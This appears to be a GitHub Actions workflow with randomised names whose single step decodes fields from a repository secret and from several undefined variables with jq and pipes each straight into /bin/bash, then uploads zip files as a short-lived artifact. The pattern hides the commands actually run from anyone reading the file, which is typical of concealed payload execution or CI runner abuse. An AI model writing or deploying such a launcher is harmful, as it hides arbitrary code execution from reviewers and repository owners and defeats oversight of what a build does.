name: mariaastroj690
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mariaastroj690
        env:
          ks034: ${{ secrets.ks034 }}
        run: |
          printf '%s' "$ks034" | jq -r .qx9 | /bin/bash
          printf '%s' "$m6" | jq -r .mxk52547 | /bin/bash
          printf '%s' "$w58" | jq -r .dxa8886 | /bin/bash
          echo $wm53 | jq -r .x27869 | /bin/bash
          echo $ycp17519 | jq -r .dr08788 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Iuogfwa4
          path: "*.zip"
          retention-days: 1
